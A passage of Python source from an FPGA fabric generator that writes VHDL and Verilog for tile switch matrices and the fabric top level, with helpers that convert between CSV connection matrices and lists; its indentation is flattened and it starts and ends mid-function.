print('\t'+' Port Map(\n',end='', file=file)
# IN1 => J_l_AB_BEG1_input(0),
# IN2 => J_l_AB_BEG1_input(1), ...
for k in range(0,mux_size):
print('\t'+'\t'+'IN'+str(k+1)+' \t=> '+line[0]+'_input('+str(k)+'),\n',end='', file=file)
# S1 => ConfigBits(low_362),
# S2 => ConfigBits(low_362 + 1, ...
for k in range(0,(math.ceil(math.log2(mux_size)))):
print('\t'+'\t'+'S'+str(k+1)+' \t=> ConfigBits('+str(old_ConfigBitstreamPosition)+' + '+str(k)+'),\n',end='', file=file)
print('\t'+'\t'+'O \t=> '+line[0]+' );\n\n',end='', file=file)
else: # generic multiplexer
if MultiplexerStyle == 'custom':
print('HINT: creating a MUX-'+str(mux_size)+' for port '+line[0]+' in switch matrix for tile '+CSVFile[0][0])
# VHDL example arbitrary mux
# J_l_AB_BEG1 <= J_l_AB_BEG1_input(TO_INTEGER(ConfigBits(363 downto 362)));
print(line[0]+'\t<= '+line[0]+'_input(',end='', file=file)
print('TO_INTEGER(UNSIGNED(ConfigBits('+str(ConfigBitstreamPosition-1)+' downto '+str(old_ConfigBitstreamPosition)+'))));', file=file)
print(' ', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
if SwitchMatrixDebugSignals == True:
print('\n', file=file)
ConfigBitstreamPosition = 0
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
if mux_size >= 2:
old_ConfigBitstreamPosition = ConfigBitstreamPosition
ConfigBitstreamPosition = ConfigBitstreamPosition + int(math.ceil(math.log2(mux_size)))
print('DEBUG_select_'+line[0]+'\t<= ConfigBits('+str(ConfigBitstreamPosition-1)+' downto '+str(old_ConfigBitstreamPosition)+');', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
# just the final end of architecture
print('\n'+'end architecture Behavioral;'+'\n', file=file)
return
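# Example use (sketch only, hypothetical file names): generate the switch matrix VHDL for a
# 'LUT4AB' tile from its adjacency matrix; the tile name must match the top-left CSV entry.
# with open('LUT4AB_switch_matrix.vhdl', 'w') as f:
#     GenTileSwitchMatrixVHDL('LUT4AB', 'LUT4AB_switch_matrix.csv', f)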
def GenerateFabricVHDL( FabricFile, file, entity = 'eFPGA' ):
# There are of course many possibilities for generating the fabric.
# I decided to generate a flat description as it may allow for a little easier debugging.
# For larger fabrics, this may be an issue, but not for now.
# We only have wires between two adjacent tiles in North, East, South, West direction.
# So we use the output ports to generate wires.
fabric = GetFabric(FabricFile)
y_tiles=len(fabric) # get the number of tiles in vertical direction
x_tiles=len(fabric[0]) # get the number of tiles in horizontal direction
TileTypes = GetCellTypes(fabric)
print('### Found the following tile types:\n',TileTypes)
# VHDL header
# entity hard-coded TODO
GenerateVHDL_Header(file, entity, MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow))
# we first scan all tiles if those have IOs that have to go to top
# the order of this scan is later maintained when instantiating the actual tiles
print('\t-- External IO ports exported directly from the corresponding tiles', file=file)
ExternalPorts = []
SharedExternalPorts = []
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
# get the top dimension index that describes the tile type (given by fabric[y][x])
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
CurrentTileExternalPorts = GetComponentPortsFromFile(fabric[y][x]+'_tile.vhdl', port='external')
if CurrentTileExternalPorts != []:
for item in CurrentTileExternalPorts:
						# we need the PortName and the PortDefinition (everything after the ':') separately
PortName = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
PortName=(replace(PortName, substitutions))
PortDefinition = re.sub('^.*\:', '', item)
if re.search('SHARED_PORT', item):
# for the entity, we define only the very first for all SHARED_PORTs of any name category
if PortName not in SharedExternalPorts:
print('\t\t'+PortName+'\t:\t'+PortDefinition, file=file)
SharedExternalPorts.append(PortName)
# we remember the used port name for the component instantiations to come
# for the instantiations, we have to keep track about all external ports
ExternalPorts.append(PortName)
else:
print('\t\t'+'Tile_X'+str(x)+'Y'+str(y)+'_'+PortName+'\t:\t'+PortDefinition, file=file)
# we remember the used port name for the component instantiations to come
							# we keep the Tile_XxYy prefix used here as a sanity check
# ExternalPorts = ExternalPorts + 'Tile_X'+str(x)+'Y'+str(y)+'_'+str(PortName)
ExternalPorts.append('Tile_X'+str(x)+'Y'+str(y)+'_'+PortName)
if ConfigBitMode == 'frame_based':
print('\t\t FrameData: in STD_LOGIC_VECTOR( (FrameBitsPerRow * '+str(y_tiles)+') -1 downto 0 ); -- CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register', file=file)
print('\t\t FrameStrobe: in STD_LOGIC_VECTOR( (MaxFramesPerCol * '+str(x_tiles)+') -1 downto 0 ); -- CONFIG_PORT this is a keyword needed to connect the tile to the bitstream frame register ', file=file)
GenerateVHDL_EntityFooter(file, entity, ConfigPort=False)
else:
GenerateVHDL_EntityFooter(file, entity)
TileTypeOutputPorts = []
for tile in TileTypes:
PrintComponentDeclarationForFile(str(tile)+'_tile.vhdl', file)
# we need the BEL ports (a little later)
Inputs, Outputs = GetComponentPortsFromFile(str(tile)+'_tile.vhdl')
TileTypeOutputPorts.append(Outputs)
# VHDL signal declarations
print('\n-- signal declarations\n', file=file)
print('\n-- configuration signal declarations\n', file=file)
if ConfigBitMode == 'FlipFlopChain':
tile_counter = 0
for y in range(y_tiles):
for x in range(x_tiles):
# for the moment, we assume that all non "NULL" tiles are reconfigurable
# (i.e. are connected to the configuration shift register)
if (fabric[y][x]) != 'NULL':
tile_counter += 1
print('signal\t'+'conf_data'+'\t:\tSTD_LOGIC_VECTOR('+str(tile_counter)+' downto 0);', file=file)
if ConfigBitMode == 'frame_based':
# for y in range(y_tiles):
# for x in range(x_tiles):
# if (fabric[y][x]) != 'NULL':
# TileConfigBits = GetNoConfigBitsFromFile(str(fabric[y][x])+'_tile.vhdl')
# if TileConfigBits != 'NULL' and int(TileConfigBits) != 0:
# print('signal Tile_X'+str(x)+'Y'+str(y)+'_ConfigBits \t:\t std_logic_vector('+TileConfigBits+' -1 downto '+str(0)+' );', file=file)
# FrameData => Tile_Y3_FrameData,
# FrameStrobe => Tile_X1_FrameStrobe
# MaxFramesPerCol : integer := 20;
# FrameBitsPerRow : integer := 32;
for y in range(y_tiles):
print('signal Tile_Y'+str(y)+'_FrameData \t:\t std_logic_vector(FrameBitsPerRow -1 downto 0);', file=file)
for x in range(x_tiles):
print('signal Tile_X'+str(x)+'_FrameStrobe \t:\t std_logic_vector(MaxFramesPerCol -1 downto 0);', file=file)
print('\n-- tile-to-tile signal declarations\n', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
# get the top dimension index that describes the tile type (given by fabric[y][x])
# for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
for line in TileTypeOutputPorts[TileTypes.index(fabric[y][x])]:
# line contains something like "E2BEG : std_logic_vector( 7 downto 0 )" so I use split on '('
SignalName, Vector = re.split('\(',line)
# print('DEBUG line: ', line, file=file)
# print('DEBUG SignalName: ', SignalName, file=file)
# print('DEBUG Vector: ', Vector, file=file)
# Vector = re.sub('--.*', '', Vector)
print('signal Tile_X'+str(x)+'Y'+str(y)+'_'+SignalName+'\t:\t std_logic_vector('+Vector+';', file=file)
# VHDL architecture body
print('\nbegin\n', file=file)
# top configuration data daisy chaining
	# this is copy and paste from tile code generation (so we can modify this here without side effects)
if ConfigBitMode == 'FlipFlopChain':
print('-- top configuration data daisy chaining', file=file)
print('conf_data(conf_data\'low) <= CONFin; -- conf_data\'low=0 and CONFin is from tile entity', file=file)
print('CONFout <= conf_data(conf_data\'high); -- CONFout is from tile entity', file=file)
if ConfigBitMode == 'frame_based':
for y in range(y_tiles):
print('Tile_Y'+str(y)+'_FrameData \t<=\t FrameData((FrameBitsPerRow*('+str(y)+'+1)) -1 downto FrameBitsPerRow*'+str(y)+');', file=file)
for x in range(x_tiles):
print('Tile_X'+str(x)+'_FrameStrobe \t<=\t FrameStrobe((MaxFramesPerCol*('+str(x)+'+1)) -1 downto MaxFramesPerCol*'+str(x)+');', file=file)
# VHDL tile instantiations
tile_counter = 0
ExternalPorts_counter = 0
print('-- tile instantiations\n', file=file)
for y in range(y_tiles):
for x in range(x_tiles):
if (fabric[y][x]) != 'NULL':
EntityName = GetComponentEntityNameFromFile(str(fabric[y][x])+'_tile.vhdl')
print('Tile_X'+str(x)+'Y'+str(y)+'_'+EntityName+' : '+EntityName, file=file)
print('\tPort Map(', file=file)
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl')
# print('DEBUG TileInputs: ', TileInputs)
# print('DEBUG TileOutputs: ', TileOutputs)
TilePorts = []
TilePortsDebug = []
# for connecting the instance, we write the tile ports in the order all inputs and all outputs
for port in TileInputs + TileOutputs:
# GetComponentPortsFromFile returns vector information that starts with "(..." and we throw that away
					# However the vector information is still interesting for debugging purposes
TilePorts.append(re.sub(' ','',(re.sub('\(.*', '', port, flags=re.IGNORECASE))))
TilePortsDebug.append(port)
# now we get the connecting input signals in the order NORTH EAST SOUTH WEST (order is given in fabric.csv)
# from the adjacent tiles. For example, a NorthEnd-port is connected to a SouthBeg-port on tile Y+1
# note that fabric[y][x] has its origin [0][0] in the top left corner
TileInputSignal = []
TileInputSignalCountPerDirection = []
# IMPORTANT: we have to go through the following in NORTH EAST SOUTH WEST order
# NORTH direction: get the NiBEG wires from tile y+1, because they drive NiEND
if y < (y_tiles-1):
if (fabric[y+1][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y+1][x])+'_tile.vhdl', filter='NORTH')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x)+'Y'+str(y+1)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# EAST direction: get the EiBEG wires from tile x-1, because they drive EiEND
if x > 0:
if (fabric[y][x-1]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x-1])+'_tile.vhdl', filter='EAST')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x-1)+'Y'+str(y)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# SOUTH direction: get the SiBEG wires from tile y-1, because they drive SiEND
if y > 0:
if (fabric[y-1][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y-1][x])+'_tile.vhdl', filter='SOUTH')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x)+'Y'+str(y-1)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# WEST direction: get the WiBEG wires from tile x+1, because they drive WiEND
if x < (x_tiles-1):
if (fabric[y][x+1]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x+1])+'_tile.vhdl', filter='WEST')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x+1)+'Y'+str(y)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# at this point, TileInputSignal is carrying all the driver signals from the surrounding tiles (the BEG signals of those tiles)
# for example when we are on Tile_X2Y2, the first entry could be "Tile_X2Y3_N1BEG( 3 downto 0 )"
# for element in TileInputSignal:
# print('DEBUG TileInputSignal :'+'Tile_X'+str(x)+'Y'+str(y), element)
# the output signals are named after the output ports
TileOutputSignal = []
TileInputsCountPerDirection = []
# as for the VHDL signal generation, we simply add a prefix like "Tile_X1Y0_" to the begin port
# for port in TileOutputs:
# TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
if (fabric[y][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='NORTH')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='EAST')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='SOUTH')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='WEST')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
# at this point, TileOutputSignal is carrying all the signal names that will be driven by the present tile
# for example when we are on Tile_X2Y2, the first entry could be "Tile_X2Y2_W1BEG( 3 downto 0 )"
# for element in TileOutputSignal:
# print('DEBUG TileOutputSignal :'+'Tile_X'+str(x)+'Y'+str(y), element)
if (fabric[y][x]) != 'NULL': # looks like this conditional is redundant
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl')
# example: W6END( 11 downto 0 ), N1BEG( 3 downto 0 ), ...
# meaning: the END-ports are the tile inputs followed by the actual tile output ports (typically BEG)
# this is essentially the left side (the component ports) of the component instantiation
CheckFailed = False
# sanity check: The number of input ports has to match the TileInputSignal per direction (N,E,S,W)
if (fabric[y][x]) != 'NULL':
for k in range(0,4):
if TileInputsCountPerDirection[k] != TileInputSignalCountPerDirection[k]:
						print('ERROR: component input mismatch in '+str(All_Directions[k])+' direction for Tile_X'+str(x)+'Y'+str(y)+' of type '+str(fabric[y][x]))
CheckFailed = True
if CheckFailed == True:
print('Error in function GenerateFabricVHDL')
print('DEBUG:TileInputs: ',TileInputs)
print('DEBUG:TileInputSignal: ',TileInputSignal)
print('DEBUG:TileOutputs: ',TileOutputs)
print('DEBUG:TileOutputSignal: ',TileOutputSignal)
# raise ValueError('Error in function GenerateFabricVHDL')
# the output ports are derived from the same list and should therefore match automatically
# for element in (TileInputs+TileOutputs):
# print('DEBUG TileInputs+TileOutputs :'+'Tile_X'+str(x)+'Y'+str(y)+'element:', element)
if (fabric[y][x]) != 'NULL': # looks like this conditional is redundant
for k in range(0,len(TileInputs)):
PortName = re.sub('\(.*', '', TileInputs[k])
print('\t'+PortName+'\t=> '+TileInputSignal[k]+',',file=file)
# print('DEBUG_INPUT: '+PortName+'\t=> '+TileInputSignal[k]+',')
for k in range(0,len(TileOutputs)):
PortName = re.sub('\(.*', '', TileOutputs[k])
print('\t'+PortName+'\t=> '+TileOutputSignal[k]+',',file=file)
# print('DEBUG_OUTPUT: '+PortName+'\t=> '+TileOutputSignal[k]+',')
# Check if this tile uses IO-pins that have to be connected to the top-level entity
CurrentTileExternalPorts = GetComponentPortsFromFile(fabric[y][x]+'_tile.vhdl', port='external')
if CurrentTileExternalPorts != []:
print('\t -- tile IO port which gets directly connected to top-level tile entity', file=file)
for item in CurrentTileExternalPorts:
# we need the PortName and the PortDefinition (everything after the ':' separately
PortName = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
PortName=(replace(PortName, substitutions))
PortDefinition = re.sub('^.*\:', '', item)
# ExternalPorts was populated when writing the fabric top level entity
print('\t\t'+PortName+' => ',ExternalPorts[ExternalPorts_counter],',', file=file)
ExternalPorts_counter += 1
if ConfigBitMode == 'FlipFlopChain':
GenerateVHDL_Conf_Instantiation(file=file, counter=tile_counter, close=True)
if ConfigBitMode == 'frame_based':
if (fabric[y][x]) != 'NULL':
TileConfigBits = GetNoConfigBitsFromFile(str(fabric[y][x])+'_tile.vhdl')
if TileConfigBits != 'NULL':
if int(TileConfigBits) == 0:
# print('\t\t ConfigBits => (others => \'-\') );\n', file=file)
							# the next one is fixing the fact that the last port assignment in vhdl is not allowed to have a ','
# this is a bit ugly, but well, vhdl is ugly too...
last_pos = file.tell()
for k in range(20):
file.seek(last_pos -k) # scan character by character backwards and look for ','
my_char = file.read(1)
if my_char == ',':
file.seek(last_pos -k) # place seek pointer to last ',' position and overwrite with a space
print(' ', end='', file=file)
break # stop scan
file.seek(0, os.SEEK_END) # go back to usual...
print('\t\t );\n', file=file)
else:
print('\t\tFrameData \t =>\t '+'Tile_Y'+str(y)+'_FrameData, ' , file=file)
print('\t\tFrameStrobe \t =>\t '+'Tile_X'+str(x)+'_FrameStrobe ); \n' , file=file)
#print('\t\t ConfigBits => ConfigBits ( '+str(TileConfigBits)+' -1 downto '+str(0)+' ) );\n', file=file)
### BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
tile_counter += 1
print('\n'+'end Behavioral;'+'\n', file=file)
return
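# Example use (sketch only): generate the flat fabric top level from the fabric CSV.
# 'fabric.csv' is a hypothetical file name; all tile VHDL files are expected to exist already,
# because the generator reads their ports back from the '<tile>_tile.vhdl' files.
# with open('eFPGA.vhdl', 'w') as f:
#     GenerateFabricVHDL('fabric.csv', f, entity='eFPGA')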
def CSV2list( InFileName, OutFileName ):
	# this function exports a given CSV switch matrix description into its equivalent list description
# format: destination,source (per line)
# read CSV file into an array of strings
InFile = [i.strip('\n').split(',') for i in open(InFileName)]
f=open(OutFileName,'w')
rows=len(InFile) # get the number of tiles in vertical direction
cols=len(InFile[0]) # get the number of tiles in horizontal direction
# top-left should be the name
print('#',InFile[0][0], file=f)
# switch matrix inputs
inputs = []
for item in InFile[0][1:]:
inputs.append(item)
# beginning from the second line, write out the list
for line in InFile[1:]:
for i in range(1,cols):
if line[i] != '0':
print(line[0]+','+inputs[i-1], file=f) # it is [i-1] because the beginning of the line is the destination port
f.close()
return
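# Illustrative example (hypothetical port names): for an adjacency matrix
#   LUT4AB,N1END0,E1END0
#   N1BEG0,1,0
#   E1BEG0,0,1
# CSV2list would write the list file
#   # LUT4AB
#   N1BEG0,N1END0
#   E1BEG0,E1END0
# i.e. one 'destination,source' pair per set connection.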
def takes_list(a_string, a_list):
	# debug helper: prints each item of a_list together with the given string
	print('first debug (a_list):',a_list, 'string:', a_string)
for item in a_list:
print('hello debug:',item, 'string:', a_string)
def ExpandListPorts(port, PortList):
# a leading '[' tells us that we have to expand the list
if re.search('\[', port):
if not re.search('\]', port):
raise ValueError('\nError in function ExpandListPorts: cannot find closing ]\n')
# port.find gives us the first occurrence index in a string
left_index = port.find('[')
right_index = port.find(']')
before_left_index = port[0:left_index]
# right_index is the position of the ']' so we need everything after that
after_right_index = port[(right_index+1):]
ExpandList = []
ExpandList = re.split('\|',port[left_index+1:right_index])
for entry in ExpandList:
ExpandListItem = (before_left_index+entry+after_right_index)
ExpandListPorts(ExpandListItem, PortList)
else:
# print('DEBUG: else, just:',port)
PortList.append(port)
return
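# Illustrative example (hypothetical port names): the '[a|b|...]' notation expands into one
# port per alternative, so
#   PortList = []
#   ExpandListPorts('N[1|2|3|4]BEG0', PortList)
# leaves PortList as ['N1BEG0', 'N2BEG0', 'N3BEG0', 'N4BEG0'].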
def list2CSV( InFileName, OutFileName ):
# this sets connections ('1') in a CSV connection matrix (OutFileName) from a list (InFileName)
# read input files into arrays of strings
InFile = [i.strip('\n').split(',') for i in open(InFileName)]
OutFile = [i.strip('\n').split(',') for i in open(OutFileName)]
#get OutFile input ports
OutFileInputPorts = []
for k in range(1,len(OutFile[0])):
OutFileInputPorts.append(OutFile[0][k])
#get OutFile output ports
OutFileOutputPorts = []
for k in range(1,len(OutFile)):
OutFileOutputPorts.append(OutFile[k][0])
# clean up InFile (the list) and remove empty lines and comments
InList = []
InFileInputPorts = []
InFileOutputPorts = []
for line in InFile:
items=len(line)
if items >= 2:
if line[0] != '' and not re.search('#', line[0], flags=re.IGNORECASE):
substitutions = {" ": "", "\t": ""}
# multiplexer output
LeftItem = replace(line[0], substitutions)
# multiplexer input
RightItem = replace(re.sub('#.*','' ,line[1]), substitutions)
if RightItem != '':
InList.append([LeftItem, RightItem])
# InFileInputPorts.append(RightItem)
# InFileOutputPorts.append(LeftItem)
ExpandListPorts(RightItem, InFileInputPorts)
ExpandListPorts(LeftItem, InFileOutputPorts)
UniqInFileInputPorts = list(set(InFileInputPorts))
UniqInFileOutputPorts = list(set(InFileOutputPorts))
# sanity check: if all used ports in InFile are in the CSV table
# which means all ports of UniqInFileInputPorts must exist in OutFileInputPorts
for port in UniqInFileInputPorts:
if port not in OutFileInputPorts:
print('\nError: input file list uses an input port', port, ' that does not exist in the CSV table\n')
# raise ValueError('\nError: input file list uses an input port that does not exist in the CSV table\n')
# ... and that all ports of UniqInFileOutputPorts must exist in OutFileOutputPorts
for port in UniqInFileOutputPorts:
if port not in OutFileOutputPorts:
print('\nError: input file list uses an output port', port, ' that does not exist in the CSV table\n')
# raise ValueError('\nError: input file list uses an output port that does not exist in the CSV table\n')
# process the InList
for line in InList:
# OutFileOutputPorts : switch matrix output port list (from CSV file)
# line[0] : switch matrix output port;
# line[1] : switch matrix input port
# we have to add a +1 on the index because of the port name lists in the first row/column
LeftPortList = []
RightPortList = []
ExpandListPorts(line[0], LeftPortList)
ExpandListPorts(line[1], RightPortList)
if len(LeftPortList) != len(RightPortList):
raise ValueError('\nError in function list2CSV: left argument:\n',line[0], '\n does not match right argument:\n', line[1])
for k in range(len(LeftPortList)):
MuxOutputIndex = OutFileOutputPorts.index(LeftPortList[k]) + 1
MuxInputIndex = OutFileInputPorts.index(RightPortList[k]) + 1
if OutFile[MuxOutputIndex][MuxInputIndex] != '0':
print('Warning: following connection exists already in CSV switch matrix: ', end='')
print(OutFileOutputPorts[MuxOutputIndex-1]+','+OutFileInputPorts[MuxInputIndex-1])
# set the connection in the adjacency matrix
OutFile[MuxOutputIndex][MuxInputIndex] = '1'
# When we parse in the CSV file, we filter out comments, starting with '#'
# so we can use this to count the number of '1' in rows (= size of multiplexers) and columns (= fan out)
# this provides some useful statistics without affecting the operation of the tool
# row scan
OutFileAnnotated = []
for line in OutFile:
Counter = 0
for item in line[1:]:
if item == '1':
Counter += 1
new_line = line
new_line.append('#')
new_line.append(str(Counter))
OutFileAnnotated.append(new_line)
# column scan
new_line = []
new_line.append('#')
for x in range(1,len(OutFile[0])):
Counter = 0
for y in range(1,len(OutFile)):
if OutFile[y][x] == '1': # column-by-column scan
Counter += 1
new_line.append(str(Counter))
OutFileAnnotated.append(new_line)
# finally overwrite switch matrix CSV file
# tmp = numpy.asarray(OutFile)
# numpy.savetxt(OutFileName, tmp, fmt='%s', delimiter=",")
tmp = numpy.asarray(OutFileAnnotated)
numpy.savetxt(OutFileName, tmp, fmt='%s', delimiter=",")
return
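# Example use (sketch only, hypothetical file names): set all connections described in a
# list file in the corresponding CSV adjacency matrix (the CSV is overwritten in place and
# gets '#'-prefixed row/column usage statistics appended):
# list2CSV('LUT4AB_switch_matrix.list', 'LUT4AB_switch_matrix.csv')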
def GenTileSwitchMatrixVerilog( tile, CSV_FileName, file ):
print('### Read '+str(tile)+' csv file ###')
CSVFile = [i.strip('\n').split(',') for i in open(CSV_FileName)]
# clean comments empty lines etc. in the mapping file
CSVFile = RemoveComments(CSVFile)
# sanity check if we have the right CSV file
if tile != CSVFile[0][0]:
raise ValueError('top left element in CSV file does not match tile type in function GenTileSwitchMatrixVerilog')
# we check if all columns contain at least one entry
# basically that a wire entering the switch matrix can also leave that switch matrix.
# When generating the actual multiplexers, we run the same test on the rows...
for x in range(1,len(CSVFile[0])):
ColBitCounter = 0
for y in range(1,len(CSVFile)):
if CSVFile[y][x] == '1':# column-by-column scan
ColBitCounter += 1
if ColBitCounter == 0:# if we never counted, it may point to a problem
print('WARNING: input port '+CSVFile[0][x]+' of switch matrix in Tile '+CSVFile[0][0]+' is not used (from function GenTileSwitchMatrixVerilog)')
# we pass the NumberOfConfigBits as a comment in the beginning of the file.
	# This makes it easier to generate the configuration port only if needed later, when building the fabric, where we only work with the Verilog files
GlobalConfigBitsCounter = 0
mux_size_list = []
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
mux_size_list.append(mux_size)
if mux_size >= 2:
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(math.ceil(math.log2(mux_size)))
print('//NumberOfConfigBits:'+str(GlobalConfigBitsCounter), file=file)
# Verilog header
module = tile+'_switch_matrix'
module_header_ports = ''
ports = []
for port in CSVFile[0][1:]:
		# the following conditional is used to capture GND and VDD so they do not show up in the switch matrix port list
if re.search('^GND', port, flags=re.IGNORECASE) or re.search('^VCC', port, flags=re.IGNORECASE) or re.search('^VDD', port, flags=re.IGNORECASE):
pass # maybe needed one day
else:
ports.append(port)
# output ports
for line in CSVFile[1:]:
ports.append(line[0])
module_header_ports = ", ".join(ports)
if GlobalConfigBitsCounter > 0:
if ConfigBitMode == 'FlipFlopChain':
module_header_ports += ', MODE, CONFin, CONFout, CLK'
elif ConfigBitMode == 'frame_based':
module_header_ports += ', ConfigBits'
else:
module_header_ports += ''
if (ConfigBitMode == 'FlipFlopChain'):
GenerateVerilog_Header(module_header_ports, file, module, package=Package, NoConfigBits=str(GlobalConfigBitsCounter))
else:
GenerateVerilog_Header(module_header_ports, file, module, package='', NoConfigBits=str(GlobalConfigBitsCounter))
# input ports
print('\t // switch matrix inputs', file=file)
# CSVFile[0][1:]: starts in the first row from the second element
for port in CSVFile[0][1:]:
		# the following conditional is used to capture GND and VDD so they do not show up in the switch matrix port list
if re.search('^GND', port, flags=re.IGNORECASE) or re.search('^VCC', port, flags=re.IGNORECASE) or re.search('^VDD', port, flags=re.IGNORECASE):
pass # maybe needed one day
else:
print('\tinput '+port+';', file=file)
# output ports
for line in CSVFile[1:]:
print('\toutput '+line[0]+';', file=file)
# this is a shared text block finishes the header and adds configuration port
if GlobalConfigBitsCounter > 0:
GenerateVerilog_PortsFooter(file, module, ConfigPort=True)
else:
GenerateVerilog_PortsFooter(file, module, ConfigPort=False)
# parameter declaration
# we may use the following in the switch matrix for providing '0' and '1' to a mux input:
print('\tparameter GND0 = 1\'b0;', file=file)
print('\tparameter GND = 1\'b0;', file=file)
print('\tparameter VCC0 = 1\'b1;', file=file)
print('\tparameter VCC = 1\'b1;', file=file)
print('\tparameter VDD0 = 1\'b1;', file=file)
print('\tparameter VDD = 1\'b1;', file=file)
print('\t', file=file)
# signal declaration
for k in range(1,len(CSVFile),1):
print('\twire ['+str(mux_size_list[k-1]),'-1:0]'+CSVFile[k][0]+'_input'+';', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
if SwitchMatrixDebugSignals == True:
print('', file=file)
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
if mux_size >= 2:
print('\twire ['+str(int(math.ceil(math.log2(mux_size))))+'-1:0] '+'DEBUG_select_'+str(line[0])+';', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
# print('debug', file=file)
#
# mux_size_list = []
# ConfigBitsCounter = 0
# for line in CSVFile[1:]:
# # we first count the number of multiplexer inputs
# mux_size=0
# for port in line[1:]:
# # print('debug: ',port)
# if port != '0':
# mux_size += 1
# mux_size_list.append(mux_size)
# if mux_size >= 2:
# print('signal \t ',line[0]+'_input','\t:\t std_logic_vector(',str(mux_size),'- 1 downto 0 );', file=file)
# # "mux_size" tells us the number of mux inputs and "int(math.ceil(math.log2(mux_size)))" the number of configuration bits
# # we count all bits needed to declare a corresponding shift register
# ConfigBitsCounter = ConfigBitsCounter + int(math.ceil(math.log2(mux_size)))
print('\n// The configuration bits (if any) are just a long shift register', file=file)
print('\n// This shift register is padded to an even number of flops/latches', file=file)
	# we only generate configuration bits if we really need configuration bits
# for example in terminating switch matrices at the fabric borders, we may just change direction without any switching
if GlobalConfigBitsCounter > 0:
if ConfigBitMode == 'ff_chain':
print('\twire ['+str(GlobalConfigBitsCounter)+'-1:0]'+' ConfigBits;', file=file)
elif ConfigBitMode == 'FlipFlopChain':
# print('DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG ConfigBitMode == FlipFlopChain')
# we pad to an even number of bits: (int(math.ceil(ConfigBitCounter/2.0))*2)
print('\twire ['+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1:0]'+' ConfigBits;', file=file)
print('\twire ['+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1:0]'+' ConfigBitsInput;', file=file)
# the configuration bits shift register
# again, we add this only if needed
if GlobalConfigBitsCounter > 0:
if ConfigBitMode == 'ff_chain':
print('// the configuration bits shift register' , file=file)
print('\t'+'always @ (posedge CLK)', file=file)
print('\t'+'begin', file=file)
			print('\t'+'\t'+'if (MODE==1\'b1) begin //configuration mode' , file=file)
print('\t'+'\t'+'\t'+'ConfigBits <= {CONFin,ConfigBits['+str(GlobalConfigBitsCounter)+'-1:1]};' , file=file)
